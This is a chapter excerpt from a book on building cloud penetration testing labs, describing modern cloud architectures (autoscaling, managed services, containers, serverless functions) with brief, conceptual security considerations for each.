Reader small image

You're reading from  Building and Automating Penetration Testing Labs in the Cloud

Product typeBook
Published inOct 2023
PublisherPackt
ISBN-139781837632398
Edition1st Edition
Right arrow
Author (1)
Joshua Arvin Lat
Joshua Arvin Lat
author image
Joshua Arvin Lat

Joshua Arvin Lat is the Chief Technology Officer (CTO) of NuWorks Interactive Labs, Inc. He previously served as the CTO for three Australian-owned companies and as director of software development and engineering for multiple e-commerce start-ups in the past. Years ago, he and his team won first place in a global cybersecurity competition with their published research paper. He is also an AWS Machine Learning Hero and has shared his knowledge at several international conferences, discussing practical strategies on machine learning, engineering, security, and management.
Read more about Joshua Arvin Lat

Right arrow

Exploring how modern cloud applications are designed, developed, and deployed

One of the primary objectives when building our penetration testing labs is to prepare a vulnerable-by-design environment that mimics real cloud environments. That said, we must have a good understanding of how modern cloud applications look as this will equip us with the knowledge required to build the right environment for our needs.

Years ago, most applications that were deployed in the cloud were designed and developed as monolithic applications. This means that the frontend, backend, and database layers of the application’s architecture were built together as a single logical unit. Most of the time, multiple developers would work on a single code repository for a project. In addition to this, the entire application, along with the database, would most likely be deployed together as a single unit inside the same server or virtual machine (similar to what’s shown in the simplified diagram in Figure 1.3):

Figure 1.3 – Deployment of monolithic applications (simplified)

From a security standpoint, an attacker that’s able to get root access to the virtual machine hosting the application server would most likely be able to access and steal sensitive information stored in the database running on the same machine.

What do we mean by root access?

Root access refers to having complete administrative privileges and unrestricted control over a computer system or virtual machine. It grants the user the highest level of access and authority, enabling them to modify system files, install or uninstall software, and perform actions that are typically restricted to other users. In the context of security, if an attacker obtains root access to a virtual machine hosting an application server, it implies they have gained full control of the system. This can potentially lead to unauthorized access to sensitive data stored in databases residing on the same machine.

Of course, there are modern applications that are still designed and architected as monolithic applications due to the benefits of having this type of architecture. However, as we will see shortly, more teams around the world are starting with a distributed microservice architecture instead of a monolithic setup. One of the notable downsides of having a monolithic architecture is that development teams may have problems scaling specific layers of the application once more users start to use the system. Once the application starts to slow down, teams may end up vertically scaling the virtual machine where the application is running. With vertical scaling, the resources of a single server, such as CPU and RAM, are increased by upgrading its hardware or adding more powerful machines. This approach allows the server to handle higher workloads and demands by enhancing its capacity. In contrast, horizontal scaling involves adding more servers to distribute the load, allowing each server to handle a portion of the overall traffic. Given that vertical scaling is generally more expensive than horizontal scaling long-term, cloud architects recommend having a distributed multi-tier setup instead since horizontal scaling involves scaling only the infrastructure resources hosting the components of the application that require scaling.

For instance, in a distributed e-commerce application, instead of vertically scaling a single monolithic server to handle increased user traffic, the system can be designed with separate tiers for the web servers, application servers, and databases. By separating different tiers, it becomes possible to independently scale each tier based on its specific resource demands. For example, while the application server layer can scale horizontally to handle increased user traffic, the database layer can scale vertically to accommodate growing data storage requirements. This way, when traffic surges, the infrastructure can horizontally scale by adding more web servers to handle the increased load, resulting in a more cost-effective and scalable solution:

Figure 1.4 – Autoscaling setup

In addition to this, a distributed multi-tier setup can easily support the autoscaling of resources due to its inherent architectural design. This flexibility allows the system to automatically adjust resource allocation without manual intervention, ensuring optimal performance and resource utilization. If the traffic that’s received by the application is spiky or unpredictable, a cloud architect may consider having an autoscaling setup for specific layers of the application to ensure that the infrastructure resources hosting the application are not underutilized.

Note

Security professionals must take into account that the downsizing operation of an autoscaling setup may delete resources automatically once the traffic received by the application goes down. It is important to note that misconfigured or incomplete autoscaling implementations generally do not have the recommended log rotation setup configured properly in production environments. This would make investigation harder since the logs stored in the compromised infrastructure resources or servers might be deleted during the automated downsizing operation.

At this point, we should have a good idea of how the initial cloud applications were designed and deployed. Fast forwarding to the present, here’s what a modern application may look like:

Figure 1.5 – What a modern cloud architecture looks like

Wow! That escalated quickly! In Figure 1.5, we can see that in addition to what was discussed already, modern application architectures may have one or more of the following as well:

  • Usage of Infrastructure as Code (IaC) solutions to automatically provision cloud resources: While building a modern cloud application, an organization could utilize IaC solutions to streamline the provisioning of cloud resources. For example, they might employ tools such as Terraform or AWS CloudFormation, defining their infrastructure requirements in code to automatically provision and configure resources such as virtual machines, storage, networking, and load balancers.
  • Usage of managed container services to ease the management of Kubernetes clusters: A company may opt to utilize managed container services to simplify the management of their Kubernetes clusters. For example, they could choose a managed Kubernetes service provided by a cloud platform, which would handle tasks such as cluster provisioning, scaling, and monitoring. This allows the company to focus on developing and deploying its application without the overhead of managing the underlying Kubernetes infrastructure.
  • A continuous integration and continuous deployment (CI/CD) pipeline: A company could set up a CI/CD pipeline to automate the process of integrating code changes, running tests, and deploying the application to the cloud. Developers would commit their code changes to a version control system, triggering an automated build process that compiles the code, runs tests, and generates artifacts. The CI/CD pipeline would then deploy the application to a staging environment for further testing and, upon successful validation, automatically promote it to a production environment.
  • Function-as-a-Service (FaaS) resources: An organization implementing a modern cloud application could utilize FaaS resources as part of their solution. For instance, they might design the application to leverage serverless functions to handle specific tasks or workflows. By breaking down the application into smaller, independent functions, the company can achieve greater scalability, reduce operational overhead, and improve resource utilization.
  • APIs consumed by web and mobile applications: A company could adopt a microservices architecture, where APIs are designed and exposed to be consumed by both web and mobile applications. In this scenario, the company would develop individual microservices that encapsulate specific functionalities and expose well-defined APIs. These APIs would then be consumed by the web and mobile applications. With this setup, there would be seamless communication and interaction between the frontend clients and the backend services.
  • Usage of managed firewalls and load balancers: An organization can leverage existing managed firewall services and solutions provided by their cloud provider, which would allow them to define and enforce security policies at the network level. In addition to this, they could utilize a load balancer service to distribute incoming traffic across multiple instances of their application. This will help ensure the scalability and high availability of modern cloud systems while removing the need to manage the underlying infrastructure and operating systems of these managed cloud resources.
  • Usage of artificial intelligence (AI) and machine learning (ML) services: A company implementing a modern cloud application could utilize AI-powered and ML-powered services by leveraging pre-trained models and APIs. For example, they could utilize an AI service for sentiment analysis to analyze customer feedback and improve user experience. In addition to this, they could also employ managed ML services for predictive analytics to enhance decision-making processes within the application.

There has also been an observable shift in the use of more managed services globally as more companies migrate their workloads to the cloud. The managed services provided by cloud platforms have gradually replaced specific components in the system that were originally maintained manually by a company’s internal system administration team. For instance, companies are leveraging managed services such as Google Cloud Pub/Sub instead of setting up their own messaging systems such as RabbitMQ. This approach allows organizations to focus their valuable time and resources on other critical business requirements.

With managed services, a major portion of the maintenance work is handled and automated by the cloud platform instead of a company’s internal team members. Here are some of the advantages when using managed services:

  • Server security patches and operational maintenance work is handled internally by the cloud platform when using managed services. This allows the company’s internal team members to use their precious time to work on other important requirements. A good example would be Amazon SageMaker, where data scientists and ML engineers can concentrate on training and deploying ML models without having to worry about manual maintenance tasks.
  • Scaling is generally easier when using managed services as a resource launch can easily be modified and scaled with an API call or through a user interface. In some cases, resources can easily have auto-scaling configured. When it comes to scaling, Azure Kubernetes Service (AKS) would be a great example as it enables easy resource scaling and adjustment of the number of pods running in the cluster.
  • Generally, cloud resources that are deployed have reliable monitoring and management tools installed already. In addition to this, the integration with other services from the same cloud platform is seamless and immediately available. At the same time, managed cloud services and resources usually have built-in practical automation features that are immediately available for use.

Note

Security professionals need to have a good idea of what’s possible and what’s not when managed services are used. For example, we are not able to access the underlying operating system of certain managed services as these were designed and implemented that way. A good example would be the managed NAT Gateway of the AWS cloud platform. In addition to this, security professionals need to be aware of other possible mechanisms available when using managed services. For example, in Amazon Aurora (a relational database management system built for the cloud), we also have the option to do passwordless authentication using an Identity and Access Management (IAM) role. This means that if an attacker manages to exfiltrate AWS credentials with the right set of permissions, the database records can be accessed and modified even without the database’s username and password.

There has been a significant increase in the usage of containers these last couple of years. If you are wondering what containers are, containers are simply lightweight, isolated environments that package applications and their dependencies to guarantee consistency and portability. Container images, on the other hand, act as self-contained executable packages, comprising the necessary files and configurations for running specific applications. Companies opt for containers because they offer quicker launch times and the capability to host multiple containers in one virtual machine and ensure consistent environments throughout various development stages. Initially, companies were hesitant in using Docker containers for deployment in production. However, due to the latest advances and release of production-ready tools such as Kubernetes, Docker Compose, and other similar container frameworks, more companies around the world have been using containers to host applications.

At this point, you might be wondering, What are the advantages of using containers? Here are a few reasons why companies would opt to utilize containers:

  • Launching new containers from container images is generally faster compared to creating new virtual machines and servers from images. This is because containers leverage lightweight virtualization and share the host system’s operating system, allowing them to start quickly without the need to boot an entire operating system. In addition to this, containers only require the necessary dependencies and libraries specific to the application, resulting in smaller image sizes and faster deployment times.
  • We can have multiple containers running inside a virtual machine. Having the ability to run multiple containers inside a virtual machine offers significant benefits in terms of resource utilization and scalability. Each container operates independently, allowing for processes and services to be isolated while sharing the underlying resources of the virtual machine. This enables efficient utilization of computing resources as multiple containers can run concurrently on the same hardware, optimizing the utilization of CPU, memory, and storage.
  • Using containers allows for seamless consistency across different environments, such as local development, staging, and production. With containerization, developers can package all necessary dependencies and configurations, ensuring that the application runs consistently across these environments. This approach promotes early consideration of environment consistency, enabling developers to detect and address any compatibility or deployment issues at an earlier stage in the development life cycle, leading to smoother deployments and reduced chances of environment-related errors.

In addition to these, nowadays, more managed cloud services already provide support for the usage of custom container environments, which gives developers the flexibility they need while ensuring that minimal work is done on the maintenance end. By leveraging these managed cloud services, developers can focus on application development and innovation while offloading the burden of infrastructure maintenance and ensuring optimal performance, scalability, and security for their containerized applications.

Note

Imagine a company developing a microservices-based application. By leveraging containers, they can encapsulate each microservice within its own container, allowing for independent development, testing, and deployment. This modular approach enables teams to iterate and update specific services without impacting the entire application stack. Furthermore, containers facilitate seamless scaling as demand fluctuates. When the application experiences increased traffic, container orchestration platforms such as Kubernetes automatically spin up additional instances of the required containers, ensuring optimal performance and resource utilization. This scalability allows businesses to efficiently handle peak loads without overprovisioning infrastructure.

That said, having a solid understanding of container security is critical due to the growing popularity of containers. Containers present unique security challenges that must be addressed to protect applications and data. By implementing effective container security measures, organizations can mitigate risks (such as unauthorized access, data breaches, and container breakouts) to ensure the security of critical systems and sensitive information.

Similar to containers, there’s also been a noticeable increase in the usage of FaaS services in the past couple of years. FaaS options from major cloud platforms, including AWS Lambda Functions, Azure Functions, and Google Cloud Functions, allow developers and engineers to deploy and run custom application code inside isolated environments without having to worry about server management. Previously, developers had to handle server provisioning and configuration. However, with serverless functions, developers can focus on writing and deploying custom application code without worrying about infrastructure, resulting in a more efficient and streamlined development process. This shift enables rapid iteration, scalable deployments, and reduced operational overhead, significantly simplifying the lives of developers. Using these along with the other building blocks of event-driven architectures, developers can divide complex application code into smaller and more manageable components. To have a better understanding of how these services work, let’s quickly discuss some of the common properties of these cloud functions:

  • Scaling up and down is automatic
  • Usage follows a pay-per-use model
  • The runtime environment gets created and deleted when a function is invoked
  • No maintenance is needed since the cloud platform takes care of the maintenance work
  • There are resource limits on maximum execution time, memory, storage, and code package size
  • Functions are triggered by events

Important note

The terms FaaS and serverless computing are sometimes used interchangeably by professionals. However, they are two different concepts. FaaS primarily focuses on having a platform that speeds up the development and deployment of application code functions. On the other hand, serverless computing refers to the cloud computing execution model, which is generally characterized by the usage of event-driven architecture, managed services, along with per-usage billing. That said, it is possible to have a serverless implementation without utilizing a FaaS service (for example, a frontend-only single-page application (SPA) hosted using the static website hosting capability of a cloud storage service).

How is this relevant to cloud security and penetration testing? The design and implementation of cloud functions impact and influence the offensive and defensive security strategies of professionals. Developers and engineers need to make sure that the code that’s deployed inside cloud functions is safe from a variety of injection attacks. For one thing, creating a file and saving it inside a storage bucket with a filename that includes a malicious payload may trigger command execution once an event triggers the cloud function. In addition to this, security professionals must find alternative ways of maintaining persistence (after a successful breach) when dealing with cloud functions since the runtime environment gets created and deleted in seconds.

At this point, you should have a good idea of what modern cloud applications look like! There is a lot more we could discuss in this section, but this should do the trick for now. With everything we have learned so far, we can now proceed with diving deeper into what we should consider when designing and building penetration testing lab environments in the cloud.

Previous PageNext Page
You have been reading a chapter from
Building and Automating Penetration Testing Labs in the Cloud
Published in: Oct 2023Publisher: PacktISBN-13: 9781837632398
Register for a free Packt account to unlock a world of extra content!
A free Packt account unlocks extra newsletters, articles, discounted offers, and much more. Start advancing your knowledge today.
undefined
Unlock this book and the full library FREE for 7 days
Get unlimited access to 7000+ expert-authored eBooks and videos courses covering every tech area you can think of
Renews at €14.99/month. Cancel anytime

Author (1)

author image
Joshua Arvin Lat

Joshua Arvin Lat is the Chief Technology Officer (CTO) of NuWorks Interactive Labs, Inc. He previously served as the CTO for three Australian-owned companies and as director of software development and engineering for multiple e-commerce start-ups in the past. Years ago, he and his team won first place in a global cybersecurity competition with their published research paper. He is also an AWS Machine Learning Hero and has shared his knowledge at several international conferences, discussing practical strategies on machine learning, engineering, security, and management.
Read more about Joshua Arvin Lat